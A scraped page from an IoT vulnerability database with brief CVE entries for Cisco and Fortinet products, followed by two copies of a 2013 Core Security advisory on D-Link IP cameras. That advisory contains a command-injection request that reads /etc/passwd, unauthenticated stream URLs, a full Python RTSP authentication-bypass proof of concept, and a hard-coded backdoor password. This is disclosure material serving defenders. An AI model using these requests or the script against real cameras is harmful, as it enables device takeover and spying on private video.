VARIoT IoT vulnerabilities database
| VAR-201305-0270 | CVE-2013-1160 | Cisco Prime Central for Hosted Collaboration Solution Vulnerable to cross-site scripting |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Cross-site scripting (XSS) vulnerability in the OpenView web menus in Cisco Prime Central for Hosted Collaboration Solution allows remote attackers to inject arbitrary web script or HTML via an unspecified parameter, aka Bug ID CSCud56743.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
This issue is being tracked by Cisco Bug ID CSCud56743
| VAR-201306-0360 | CVE-2013-4669 | plural OS Run on FortiClient Vulnerability in which important information is obtained |
CVSS V2: 5.4 CVSS V3: - Severity: MEDIUM |
FortiClient before 4.3.5.472 on Windows, before 4.0.3.134 on Mac OS X, and before 4.0 on Android; FortiClient Lite before 4.3.4.461 on Windows; FortiClient Lite 2.0 through 2.0.0223 on Android; and FortiClient SSL VPN before 4.0.2258 on Linux proceed with an SSL session after determining that the server's X.509 certificate is invalid, which allows man-in-the-middle attackers to obtain sensitive information by leveraging a password transmission that occurs before the user warning about the certificate problem. Fortinet FortiClient VPN client is prone to a security-bypass vulnerability because the application fails to properly validate SSL certificates from the server.
An attacker can exploit this issue to perform man-in-the-middle attacks or impersonate trusted servers, which will aid in further attacks. Fortinet FortiClient, FortiClient Lite and FortiClient SSL VPN are all products of Fortinet. FortiClient is a suite of software solutions that provide security for endpoints, providing features such as IPsec and SSL encryption, WAN optimization, endpoint compliance, and two-factor authentication. FortiClient Lite is a free antivirus software that offers malware detection, real-time protection, parental controls, web filtering, and more. FortiClient SSL VPN is an integrated software in FortiClient products, which mainly provides virtual private network technology. Vulnerabilities exist in the following versions: Windows-based FortiClient prior to 4.3.5.472, Mac OS X-based FortiClient prior to 4.0.3.134, Android-based FortiClient prior to 4.0, Windows-based FortiClient Lite 4.3.4.461 Previous versions, FortiClient Lite 2.0 to 2.0.0223 based on the Android platform, versions earlier than FortiClient SSL VPN 4.0.2258 based on the Linux platform
| VAR-201305-0164 | CVE-2013-1234 | Cisco IOS XR of SNMP Service disruption in modules (DoS) Vulnerabilities |
CVSS V2: 4.0 CVSS V3: - Severity: MEDIUM |
The SNMP module in Cisco IOS XR allows remote authenticated users to cause a denial of service (process restart) via crafted SNMP packets, aka Bug ID CSCue69472. Cisco IOS is a popular Internet operating system. Cisco IOS XR is prone to a remote denial-of-service vulnerability.
Successfully exploiting this issue may allow an attacker to cause a denial of service condition.
This issue is being tracked by Cisco Bug ID CSCue69472.
Cisco IOS XR 4.3 and prior versions are vulnerable
| VAR-201305-0271 | CVE-2013-1156 | Cisco Prime Central for Hosted Collaboration Solution Vulnerable to directory traversal |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Directory traversal vulnerability in Cisco Prime Central for Hosted Collaboration Solution allows remote attackers to read arbitrary files via a crafted URL, aka Bug ID CSCud51034.
Remote attackers can use specially crafted requests with directory-traversal sequences ('../') to retrieve arbitrary files in the context of the application. This may aid in further attacks.
This issue is being tracked by Cisco Bug ID CSCud51034
| VAR-201305-0273 | CVE-2013-1158 | Cisco Prime Central for Hosted Collaboration Solution Vulnerable to cross-site scripting |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Cross-site scripting (XSS) vulnerability in the IBM Tivoli Monitoring (ITM) help menus in Cisco Prime Central for Hosted Collaboration Solution allows remote attackers to inject arbitrary web script or HTML via an unspecified parameter, aka Bug ID CSCud54397. Vendors have confirmed this vulnerability Bug ID CSCud54397 It is released as.By any third party through unspecified parameters Web Script or HTML May be inserted.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
This issue is being tracked by Cisco Bug ID CSCud54397. IBM Tivoli Monitoring (ITM) is a set of system monitoring software developed by IBM Corporation in the United States. The software supports detection of system bottlenecks and potential problems, performance monitoring of essential system resources, automatic recovery from critical situations, and more
| VAR-201305-0269 | CVE-2013-1159 | Cisco Prime Central for Hosted Collaboration Solution Vulnerable to cross-site scripting |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Cross-site scripting (XSS) vulnerability in the Netcool Impact (NCI) web menus in Cisco Prime Central for Hosted Collaboration Solution allows remote attackers to inject arbitrary web script or HTML via an unspecified parameter, aka Bug ID CSCud56706.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
This issue is being tracked by Cisco Bug ID CSCud56706. Cisco Prime is a service-centric solution developed by Cisco, which integrates and manages wired and wireless LANs, WANs, and data centers from terminals, network devices, and applications, and screens information
| VAR-201305-0161 | CVE-2013-1230 | Cisco Unified Communications Domain Manager Service disruption in (DoS) Vulnerabilities |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Cisco Unified Communications Domain Manager allows remote attackers to cause a denial of service (CPU consumption) via a flood of malformed UDP packets, aka Bug ID CSCug47057.
Attackers can exploit this issue to cause the device to consume excessive CPU resources, resulting in denial-of-service conditions.
This issue is being tracked by Cisco Bug ID CSCug47057. This component provides a scalable, distributed and highly available enterprise IP telephony call processing solution
| VAR-202001-0839 | CVE-2013-1599 |
plural D-Link IP Camera In products OS Command injection vulnerability
Related entries in the VARIoT exploits database: VAR-E-201304-0137 |
CVSS V2: 10.0 CVSS V3: 9.8 Severity: CRITICAL |
A Command Injection vulnerability exists in the /var/www/cgi-bin/rtpd.cgi script in D-Link IP Cameras DCS-3411/3430 firmware 1.02, DCS-5605/5635 1.01, DCS-1100L/1130L 1.04, DCS-1100/1130 1.03, DCS-1100/1130 1.04_US, DCS-2102/2121 1.05_RU, DCS-3410 1.02, DCS-5230 1.02, DCS-5230L 1.02, DCS-6410 1.00, DCS-7410 1.00, DCS-7510 1.00, and WCS-1100 1.02, which could let a remote malicious user execute arbitrary commands through the camera’s web interface. plural D-Link IP Camera Products include OS A command injection vulnerability exists.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. There are security vulnerabilities in multiple D-Link webcam products. Multiple D-Link webcam products '/var/www/cgi-bin/rtpd.cgi' have input validation vulnerabilities that allow remote attackers to exploit vulnerabilities to submit requests similar to the following to execute arbitrary commands in the application context: http:// 192.168.1.100/cgi-bin/rtpd.cgi?uname&-a;cat&/etc/passwd.
Exploiting this issue could allow an attacker to execute arbitrary commands in the context of the affected device. *Advisory Information*
Title: D-Link IP Cameras Multiple Vulnerabilities
Advisory ID: CORE-2013-0303
Advisory URL:
http://www.coresecurity.com/advisories/d-link-ip-cameras-multiple-vulnerabilities
Date published: 2013-04-29
Date of last update: 2013-03-29
Vendors contacted: D-Link Corporation
Release mode: Coordinated release
2. *Vulnerability Information*
Class: OS command injection [CWE-78], Authentication issues [CWE-287],
Information leak through GET request [CWE-598], Authentication issues
[CWE-287], Use of hard-coded credentials [CWE-798]
Impact: Code execution, Security bypass
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2013-1599, CVE-2013-1600, CVE-2013-1601, CVE-2013-1602,
CVE-2013-1603
3. *Vulnerability Description*
Multiple vulnerabilities have been found in D-Link IP cameras [1] that
could allow an unauthenticated remote attacker:
1. [CVE-2013-1600] to access the video stream via HTTP,
3. [CVE-2013-1601] to access the ASCII video stream via image luminance,
4. [CVE-2013-1602] to access the video stream via RTSP,
5. [CVE-2013-1603] to bypass RTSP authentication using hard-coded
credentials.
4. *Vulnerable Packages*
The following is the list of affected devices and the associated
firmware (confirmed by D-Link). Other SKUs are probably affected too,
but they were not checked.
[CVE-2013-1599]
. DCS-3411/3430 - firmware v1.02
. DCS-5605/5635 - v1.01
. DCS-1100L/1130L - v1.04
. DCS-1100/1130 - v1.03
. DCS-1100/1130 - v1.04_US
. DCS-2102/2121 - v1.05_RU
. DCS-3410 - v1.02
. DCS-5230 - v1.02
. DCS-5230L - v1.02
. DCS-6410 - v1.00
. DCS-7410 - v1.00
. DCS-7510 - v1.00
. WCS-1100 - v1.02
[CVE-2013-1600]
. DCS-2102/2121 - v1.05_RU
. DCS-2102/2121 - v1.06
. DCS-2102/2121 - v1.06_FR
. TESCO DCS-2102/2121 - v1.05_TESCO
[CVE-2013-1601] and [CVE-2013-1603]
. DCS-3411/3430 - v1.02
. DCS-5605/5635 - v1.01
. DCS-1100L/1130L - v1.04
. DCS-1100/1130 - v1.03
. DCS-1100/1130 - v1.04_US
. DCS-2102/2121 - v1.05_RU
. DCS-2102/2121 - v1.06
. DCS-2102/2121 - v1.06_FR
. TESCO DCS-2102/2121 - v1.05_TESCO
. DCS-3410 - v1.02
. DCS-5230 - v1.02
. DCS-5230L - v1.02
. DCS-6410 - v1.00
. DCS-7410 - v1.00
. DCS-7510 - v1.00
. WCS-1100 - v1.02
[CVE-2013-1602]
. ALL mentioned devices and firmware.
5. *Vendor Information, Solutions and Workarounds*
D-Link announces that all patches are ready and scheduled for posting on
corporate web site for all customers [2013-04-25]. Contact D-Link for
further information.
6. *Credits*
[CVE-2013-1599], [CVE-2013-1600] and [CVE-2013-1601] were discovered and
researched by Francisco Falcon and Nahuel Riva from Core Exploit Writers
Team.
[CVE-2013-1602] was discovered and researched by Martin Rocha from Core
Impact Pro Team. The PoC was made by Martin Rocha with help of Juan
Cotta from Core QA Team.
[CVE-2013-1603] was discovered and researched by Pablo Santamaria from
Core Security Consulting Services.
The publication of this advisory was coordinated by Fernando Miranda
from Core Advisories Team.
7. *Technical Description / Proof of Concept Code*
7.1. The OS command injection is due to
this code in 'rtpd.cgi':
/-----
echo "$QUERY_STRING" | grep -vq ' ' || die "query string cannot contain
spaces."
. $conf > /dev/null 2> /dev/null
eval "$(echo $QUERY_STRING | sed -e 's/&/ /g')"
-----/
The first line of this snippet basically ensures that there are no
spaces in '$QUERY_STRING'. The last line uses 'sed' to replace
ampersands '&' with spaces, and then call to the function 'eval()',
resulting in a typical command injection. For example, in order to execute:
/-----
uname -a;cat /etc/passwd
-----/
the following request can be sent to the camera web interface:
/-----
http://192.168.1.100/cgi-bin/rtpd.cgi?uname&-a;cat&/etc/passwd
-----/
7.2. *Authentication Bypass*
[CVE-2013-1600] The live video stream can be accessed without
authentication by a remote attacker via the following request:
/-----
http://192.168.1.100/upnp/asf-mp4.asf
-----/
7.3. *ASCII Video Stream Information Leak*
[CVE-2013-1601] An ASCII output (the image luminance) of the live video
stream can be accessed by a remote unauthenticated attacker via:
/-----
http://192.168.1.100/md/lums.cgi
-----/
The following example is the output of a coffee pot video stream [2]:
/-----
O O O O O O O O O O O O O O O O O O O O O O O O O O o o o o o o o o o o o o
O O O O O O O O O O O O O O O O O O O O o o o O O O o o o o o o o o o o o o
O O O O O O O O O O O O O O O O O O . o O O o o o o o o o o o o o
O O O O O O O O O O O O o o O O o . o o o o o o o o o o o o o o
O O O O O O O O O O O O o o o o . o o o o o o o
O O O O O O O O O O o . o O O o . o o o o o o
O O O O O O O O O . o o o o o o
O O O O O O O O . o o o o o o o o
O O O O O O O . o O O o . o o o o o o o o o
O O O O O O o . O O O O O O . o o o o o o o o o
O O O O O O . O O O O O O O . o o o o o o o o o
O O O O O O o O O O O O O O . o . o o o o o o o o
O O O O O O o O O O O O O O . o o o . o o o o o o o o
O O O O O O o O O O O O O o . o O O o O O . o o o o o o o
O O O O O O . o O O O O O O o . O O O o O O . o o o o o o
O O O O O O . O O O O O o . O O o o O O o . o o o o o o
O O O O O O o O O O O O o . o O O o o O O o . o o o o o
O O O O O O O O O O O O . o O O o o O O o . o o o o o
O O O O O O O . o O O O o . o o o O o o O O o . o o o o
O O O O O O O o . O O O o . o o o O o o O O o . o o o o
O O O O O O O O . O O O . o o o O o o O O o . o o o o
O O O O O O O O O O O . o o o O o o O O o . o o o
O O O O O O O O o o O o o o o o O o o o O o . o o o
O O O O O O O O O . O o o o o o O o . o O o . o o
O O O O O O O O O . O o . o o o o O . o O o . o
O O O O O O O O O o o . o o o o o . o O o . o
O O O O O O O O O O . o o o . o . o O o .
o O O O O O O O O O . o o o . o . O o .
o o O O O O O O O O o . o o o . o . O o .
o o o O O O O O O O o . o o o . o . O o .
-----/
7.4. *RTSP Authentication Bypass*
[CVE-2013-1602] This vulnerability is triggered because:
1. Authentication is only present in DESCRIBE requests but not in
every subsequent request.
2. When the RTSP session is being established, the authentication
request of current session is ignored (a previously stored response is
used instead).
As a result, the video stream can be accessed by an unauthenticated
remote attacker.
/-----
import sys
from socket import *
from threading import Thread
import time, re
LOGGING = 1
def log(s):
if LOGGING:
print '(%s) %s' % (time.ctime(), s)
class UDPRequestHandler(Thread):
def __init__(self, data_to_send, recv_addr, dst_addr):
Thread.__init__(self)
self.data_to_send = data_to_send
self.recv_addr = recv_addr
self.dst_addr = dst_addr
def run(self):
sender = socket(AF_INET, SOCK_DGRAM)
sender.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
sender.sendto(self.data_to_send, self.dst_addr)
response = sender.recv(1024)
sender.sendto(response, self.recv_addr)
sender.close()
class UDPDispatcher(Thread):
dispatchers = []
def __has_dispatcher_for(self, port):
return any([d.src_port == port for d in UDPDispatcher.dispatchers])
def __init__(self, src_port, dst_addr):
Thread.__init__(self)
if self.__has_dispatcher_for(src_port):
raise Exception('There is already a dispatcher for port %d'
% src_port)
self.src_port = src_port
self.dst_addr = dst_addr
UDPDispatcher.dispatchers.append(self)
def run(self):
listener = socket(AF_INET, SOCK_DGRAM)
listener.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
listener.bind(('', self.src_port))
while 1:
try:
data, recv_addr = listener.recvfrom(1024)
if not data: break
UDPRequestHandler(data, recv_addr, self.dst_addr).start()
except Exception as e:
print e
break
listener.close()
UDPDispatcher.dispatchers.remove( self )
class PipeThread(Thread):
pipes = []
def __init__(self, source, sink, process_data_callback=lambda x: x):
Thread.__init__(self)
self.source = source
self.sink = sink
self.process_data_callback = process_data_callback
PipeThread.pipes.append(self)
def run(self):
while 1:
try:
data = self.source.recv(1024)
data = self.process_data_callback(data)
if not data: break
self.sink.send( data )
except Exception as e:
log(e)
break
PipeThread.pipes.remove(self)
class TCPTunnel(Thread):
def __init__(self, src_port, dst_addr, process_data_callback=lambda
x: x):
Thread.__init__(self)
log('[*] Redirecting: localhost:%s -> %s:%s' % (src_port,
dst_addr[0], dst_addr[1]))
self.dst_addr = dst_addr
self.process_data_callback = process_data_callback
# Create TCP listener socket
self.sock = socket(AF_INET, SOCK_STREAM)
self.sock.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
self.sock.bind(('', src_port))
self.sock.listen(5)
def run(self):
while 1:
# Wait until a new connection arises
newsock, address = self.sock.accept()
# Create forwarder socket
fwd = socket(AF_INET, SOCK_STREAM)
fwd.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
fwd.connect(self.dst_addr)
# Pipe them!
PipeThread(newsock, fwd, self.process_data_callback).start()
PipeThread(fwd, newsock, self.process_data_callback).start()
class Camera():
def __init__(self, address):
self.address = address
def get_describe_data(self):
return ''
class DLink(Camera):
# D-Link DCS-2102/1.06-5731
def __init__(self, address):
Camera.__init__(self, address)
def get_describe_data(self):
return
'\x76\x3d\x30\x0d\x0a\x6f\x3d\x43\x56\x2d\x52\x54\x53\x50\x48\x61\x6e\x64\x6c\x65\x72\x20\x31\x31\x32\x33\x34\x31\x32\x20\x30\x20\x49\x4e\x20\x49\x50\x34\x20\x31\x39\x32\x2e\x31\x36\x38\x2e\x32\x2e\x31\x31\x0d\x0a\x73\x3d\x44\x43\x53\x2d\x32\x31\x30\x32\x0d\x0a\x63\x3d\x49\x4e\x20\x49\x50\x34\x20\x30\x2e\x30\x2e\x30\x2e\x30\x0d\x0a\x74\x3d\x30\x20\x30\x0d\x0a\x61\x3d\x63\x68\x61\x72\x73\x65\x74\x3a\x53\x68\x69\x66\x74\x5f\x4a\x49\x53\x0d\x0a\x61\x3d\x72\x61\x6e\x67\x65\x3a\x6e\x70\x74\x3d\x6e\x6f\x77\x2d\x0d\x0a\x61\x3d\x63\x6f\x6e\x74\x72\x6f\x6c\x3a\x2a\x0d\x0a\x61\x3d\x65\x74\x61\x67\x3a\x31\x32\x33\x34\x35\x36\x37\x38\x39\x30\x0d\x0a\x6d\x3d\x76\x69\x64\x65\x6f\x20\x30\x20\x52\x54\x50\x2f\x41\x56\x50\x20\x39\x36\x0d\x0a\x62\x3d\x41\x53\x3a\x31\x38\x0d\x0a\x61\x3d\x72\x74\x70\x6d\x61\x70\x3a\x39\x36\x20\x4d\x50\x34\x56\x2d\x45\x53\x2f\x39\x30\x30\x30\x30\x0d\x0a\x61\x3d\x63\x6f\x6e\x74\x72\x6f\x6c\x3a\x74\x72\x61\x63\x6b\x49\x44\x3d\x31\x0d\x0a\x61\x3d\x66\x6d\x74\x70\x3a\x39\x36\x20\x70\x72\x6f\x66\x69\x6c\x65\x2d\x6c\x65\x76\x65\x6c\x2d\x69\x64\x3d\x31\x3b\x63\x6f\x6e\x66\x69\x67\x3d\x30\x30\x30\x30\x30\x31\x42\x30\x30\x31\x30\x30\x30\x30\x30\x31\x42\x35\x30\x39\x30\x30\x30\x30\x30\x31\x30\x30\x30\x30\x30\x30\x30\x31\x32\x30\x30\x30\x43\x34\x38\x38\x42\x41\x39\x38\x35\x31\x34\x30\x34\x33\x43\x31\x34\x34\x33\x46\x3b\x64\x65\x63\x6f\x64\x65\x5f\x62\x75\x66\x3d\x37\x36\x38\x30\x30\x0d\x0a\x61\x3d\x73\x65\x6e\x64\x6f\x6e\x6c\x79\x0d\x0a\x6d\x3d\x61\x75\x64\x69\x6f\x20\x30\x20\x52\x54\x50\x2f\x41\x56\x50\x20\x30\x0d\x0a\x61\x3d\x72\x74\x70\x6d\x61\x70\x3a\x30\x20\x50\x43\x4d\x55\x2f\x38\x30\x30\x30\x0d\x0a\x61\x3d\x63\x6f\x6e\x74\x72\x6f\x6c\x3a\x74\x72\x61\x63\x6b\x49\x44\x3d\x32\x0d\x0a\x61\x3d\x73\x65\x6e\x64\x6f\x6e\x6c\x79\x0d\x0a'
class RTSPAuthByPasser():
DESCRIBE_REQ_HEADER = 'DESCRIBE rtsp://'
UNAUTHORIZED_RESPONSE = 'RTSP/1.0 401 Unauthorized'
SERVER_PORT_ARGUMENTS = 'server_port='
DEFAULT_CSEQ = 1
DEFAULT_SERVER_PORT_RANGE = '5556-5559'
def __init__(self, local_port, camera):
self.last_describe_req = ''
self.camera = camera
self.local_port = local_port
def start(self):
log('[!] Starting bypasser')
TCPTunnel(self.local_port, self.camera.address,
self.spoof_rtsp_conn).start()
def spoof_rtsp_conn(self, data):
if RTSPAuthByPasser.DESCRIBE_REQ_HEADER in data:
self.last_describe_req = data
elif RTSPAuthByPasser.UNAUTHORIZED_RESPONSE in data and
self.last_describe_req:
log('[!] Unauthorized response received. Spoofing...')
spoofed_describe = self.camera.get_describe_data()
# Look for the request CSeq
m = re.search('.*CSeq:\\s*(\\d+?)\r\n.*',
self.last_describe_req)
cseq = m.group(1) if m else RTSPAuthByPasser.DEFAULT_CSEQ
# Create the response
data = 'RTSP/1.0 200 OK\r\n'
data+= 'CSeq: %s\r\n' % cseq
data+= 'Content-Type: application/sdp\r\n'
data+= 'Content-Length: %d\r\n' % len(spoofed_describe)
data+= '\r\n'
# Attach the spoofed describe
data+= spoofed_describe
elif RTSPAuthByPasser.SERVER_PORT_ARGUMENTS in data:
# Look for the server RTP ports
m = re.search('.*%s\\s*(.+?)[;|\r].*' %
RTSPAuthByPasser.SERVER_PORT_ARGUMENTS, data)
ports = m.group(1) if m else
RTSPAuthByPasser.DEFAULT_SERVER_PORT_RANGE
# For each port in the range create a UDP dispatcher
begin_port, end_port = map(int, ports.split('-'))
for udp_port in xrange(begin_port, end_port + 1):
try:
UDPDispatcher(udp_port, (self.camera.address[0],
udp_port)).start()
except:
pass
return data
if __name__ == '__main__':
if len( sys.argv ) > 1:
listener_port = camera_port = int(sys.argv[1])
camera_ip = sys.argv[2]
if len(sys.argv) == 4:
camera_port = int(sys.argv[3])
RTSPAuthByPasser(listener_port, DLink((camera_ip,
camera_port))).start()
else:
print 'usage: python %s [local_port] [camera_ip]
[camera_rtsp_port]'
-----/
7.5. *RTSP Hard-Coded Credentials*
[CVE-2013-1603] RTSP service contains hard-coded credentials that
effectively serve as a backdoor, which allows remote attackers to access
the RTSP video stream.
/-----
username: (any)
password: ?*
-----/
As we can see in the following dump, the submitted password is compared
with the string ':?*' (the character ':' is used for concatenation of
'username:password'). This code belongs to the binary 'rtspd':
/-----
.text:00011468 loc_11468 ; Load from Memory
.text:00011468 LDR R3, [R11,#s2]
.text:0001146C STR R3, [R11,#var_C0] ; Store to Memory
.text:00011470 LDR R2, [R11,#var_C0] ; Load from Memory
.text:00011474 LDR R3, [R11,#var_BC] ; Load from Memory
.text:00011478 ADD R3, R2, R3 ; Rd = Op1 + Op2
.text:0001147C SUB R3, R3, #3 ; Rd = Op1 - Op2
.text:00011480 STR R3, [R11,#var_C0] ; Store to Memory
.text:00011484 LDR R0, [R11,#var_C0] ; s1
.text:00011488 LDR R1, =asc_1B060 ; ":?*" <-------
.text:0001148C MOV R2, #3 ; n
.text:00011490 BL strncmp ; Branch with Link
.text:00011494 MOV R3, R0 ; Rd = Op2
.text:00011498 CMP R3, #0 ; Set cond. codes on Op1 - Op2
.text:0001149C BNE loc_114BC ; Branch
-----/
8. *Report Timeline*
. 2013-03-19:
Core Security Technologies notifies the D-Link team of the vulnerability. 2013-03-20:
D-Link team asks for a technical description of the vulnerability. 2013-03-20:
Core sends a draft advisory with technical details and set the estimated
publication date of the advisory for May 14th, 2013. 2013-03-20:
Vendor notifies that D-Link Corporation has an unpublished bounty
program for security advisors. The bounty program requires both Core
Security and D-Link to sign a memo of understanding (MoU). 2013-03-25:
Core notifies that receiving money from vendors may bias the view of the
report and rejects the bounty program. 2013-03-29:
Vendor notifies that they hope to close the fix ASAP. 2013-04-08:
Vendor sends the list of vulnerable devices and the associated firmware
and notifies that they will release patches and release notes on the
D-Link support forum first. Then, an official public release will be
announced (approx. 1 month from forum post to full release). 2013-04-24:
Core asks for a clarification regarding the D-Link release date and
notifies that releasing fixes to a privileged closed group and/or a
closed forum or list is unacceptable. 2013-04-25:
Vendor notifies that the patches are ready and scheduled for posting on
D-Link web site over the next few days. 2013-04-26:
Core notifies that the advisory is re-scheduled for Monday 29th. 2013-04-29:
Advisory CORE-2013-0303 published.
9. *References*
[1] http://www.dlink.com/us/en/home-solutions/view/network-cameras.
[2]
http://corelabs.coresecurity.com/themes/sample_theme/images/coffee-pot.png.
10. *About CoreLabs*
CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://corelabs.coresecurity.com.
11. *About Core Security Technologies*
Core Security Technologies enables organizations to get ahead of threats
with security test and measurement solutions that continuously identify
and demonstrate real-world exposures to their most critical assets. Our
customers can gain real visibility into their security standing, real
validation of their security controls, and real metrics to more
effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted
research and leading-edge threat expertise from the company's Security
Consulting Services, CoreLabs and Engineering groups. Core Security
Technologies can be reached at +1 (617) 399-6980 or on the Web at:
http://www.coresecurity.com.
12. *Disclaimer*
The contents of this advisory are copyright (c) 2013 Core Security
Technologies and (c) 2013 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
13. *PGP/GPG Keys*
This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc
| VAR-202001-0842 | CVE-2013-1602 |
plural D-Link Information disclosure vulnerabilities in products
Related entries in the VARIoT exploits database: VAR-E-201304-0137 |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
An Information Disclosure vulnerability exists due to insufficient validation of authentication cookies for the RTSP session in D-Link DCS-5635 1.01, DCS-1100L 1.04, DCS-1130L 1.04, DCS-1100 1.03/1.04_US, DCS-1130 1.03/1.04_US , DCS-2102 1.05_RU/1.06/1.06_FR/1.05_TESCO, DCS-2121 1.05_RU/1.06/1.06_FR/1.05_TESCO, DCS-3410 1.02, DCS-5230 1.02, DCS-5230L 1.02, DCS-6410 1.0, DCS-7410 1.0, DCS-7510 1.0, and WCS-1100 1.02, which could let a malicious user obtain unauthorized access to video streams. plural D-Link The product contains an information disclosure vulnerability.Information may be obtained. There are security vulnerabilities in multiple D-Link webcam products.
Exploiting this issue could allow an unauthenticated attacker to gain access to potentially sensitive information, such as a video stream. *Advisory Information*
Title: D-Link IP Cameras Multiple Vulnerabilities
Advisory ID: CORE-2013-0303
Advisory URL:
http://www.coresecurity.com/advisories/d-link-ip-cameras-multiple-vulnerabilities
Date published: 2013-04-29
Date of last update: 2013-03-29
Vendors contacted: D-Link Corporation
Release mode: Coordinated release
2. *Vulnerability Information*
Class: OS command injection [CWE-78], Authentication issues [CWE-287],
Information leak through GET request [CWE-598], Authentication issues
[CWE-287], Use of hard-coded credentials [CWE-798]
Impact: Code execution, Security bypass
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2013-1599, CVE-2013-1600, CVE-2013-1601, CVE-2013-1602,
CVE-2013-1603
3. *Vulnerability Description*
Multiple vulnerabilities have been found in D-Link IP cameras [1] that
could allow an unauthenticated remote attacker:
1. [CVE-2013-1599] to execute arbitrary commands from the
administration web interface,
2. [CVE-2013-1600] to access the video stream via HTTP,
3. [CVE-2013-1601] to access the ASCII video stream via image luminance,
4. [CVE-2013-1602] to access the video stream via RTSP,
5. [CVE-2013-1603] to bypass RTSP authentication using hard-coded
credentials.
4. *Vulnerable Packages*
The following is the list of affected devices and the associated
firmware (confirmed by D-Link). Other SKUs are probably affected too,
but they were not checked.
[CVE-2013-1599]
. DCS-3411/3430 - firmware v1.02
. DCS-5605/5635 - v1.01
. DCS-1100L/1130L - v1.04
. DCS-1100/1130 - v1.03
. DCS-1100/1130 - v1.04_US
. DCS-2102/2121 - v1.05_RU
. DCS-3410 - v1.02
. DCS-5230 - v1.02
. DCS-5230L - v1.02
. DCS-6410 - v1.00
. DCS-7410 - v1.00
. DCS-7510 - v1.00
. WCS-1100 - v1.02
[CVE-2013-1600]
. DCS-2102/2121 - v1.05_RU
. DCS-2102/2121 - v1.06
. DCS-2102/2121 - v1.06_FR
. TESCO DCS-2102/2121 - v1.05_TESCO
[CVE-2013-1601] and [CVE-2013-1603]
. DCS-3411/3430 - v1.02
. DCS-5605/5635 - v1.01
. DCS-1100L/1130L - v1.04
. DCS-1100/1130 - v1.03
. DCS-1100/1130 - v1.04_US
. DCS-2102/2121 - v1.05_RU
. DCS-2102/2121 - v1.06
. DCS-2102/2121 - v1.06_FR
. TESCO DCS-2102/2121 - v1.05_TESCO
. DCS-3410 - v1.02
. DCS-5230 - v1.02
. DCS-5230L - v1.02
. DCS-6410 - v1.00
. DCS-7410 - v1.00
. DCS-7510 - v1.00
. WCS-1100 - v1.02
[CVE-2013-1602]
. ALL mentioned devices and firmware.
5. *Vendor Information, Solutions and Workarounds*
D-Link announces that all patches are ready and scheduled for posting on
corporate web site for all customers [2013-04-25]. Contact D-Link for
further information.
6. *Credits*
[CVE-2013-1599], [CVE-2013-1600] and [CVE-2013-1601] were discovered and
researched by Francisco Falcon and Nahuel Riva from Core Exploit Writers
Team.
[CVE-2013-1602] was discovered and researched by Martin Rocha from Core
Impact Pro Team. The PoC was made by Martin Rocha with help of Juan
Cotta from Core QA Team.
[CVE-2013-1603] was discovered and researched by Pablo Santamaria from
Core Security Consulting Services.
The publication of this advisory was coordinated by Fernando Miranda
from Core Advisories Team.
7. *Technical Description / Proof of Concept Code*
7.1. *OS Command Injection*
[CVE-2013-1599] A security issue located in '/var/www/cgi-bin/rtpd.cgi'
allows an unauthenticated remote attacker to execute arbitrary commands
through the camera's web interface. The OS command injection is due to
this code in 'rtpd.cgi':
/-----
echo "$QUERY_STRING" | grep -vq ' ' || die "query string cannot contain
spaces."
. $conf > /dev/null 2> /dev/null
eval "$(echo $QUERY_STRING | sed -e 's/&/ /g')"
-----/
The first line of this snippet basically ensures that there are no
spaces in '$QUERY_STRING'. The last line uses 'sed' to replace
ampersands '&' with spaces, and then call to the function 'eval()',
resulting in a typical command injection. For example, in order to execute:
/-----
uname -a;cat /etc/passwd
-----/
the following request can be sent to the camera web interface:
/-----
http://192.168.1.100/cgi-bin/rtpd.cgi?uname&-a;cat&/etc/passwd
-----/
7.2. *ASCII Video Stream Information Leak*
[CVE-2013-1601] An ASCII output (the image luminance) of the live video
stream can be accessed by a remote unauthenticated attacker via:
/-----
http://192.168.1.100/md/lums.cgi
-----/
The following example is the output of a coffee pot video stream [2]:
/-----
O O O O O O O O O O O O O O O O O O O O O O O O O O o o o o o o o o o o o o
O O O O O O O O O O O O O O O O O O O O o o o O O O o o o o o o o o o o o o
O O O O O O O O O O O O O O O O O O . o O O o o o o o o o o o o o
O O O O O O O O O O O O o o O O o . o o o o o o o o o o o o o o
O O O O O O O O O O O O o o o o . o o o o o o o
O O O O O O O O O O o . o O O o . o o o o o o
O O O O O O O O O . o o o o o o
O O O O O O O O . o o o o o o o o
O O O O O O O . o O O o . o o o o o o o o o
O O O O O O o . O O O O O O . o o o o o o o o o
O O O O O O . O O O O O O O . o o o o o o o o o
O O O O O O o O O O O O O O . o . o o o o o o o o
O O O O O O o O O O O O O O . o o o . o o o o o o o o
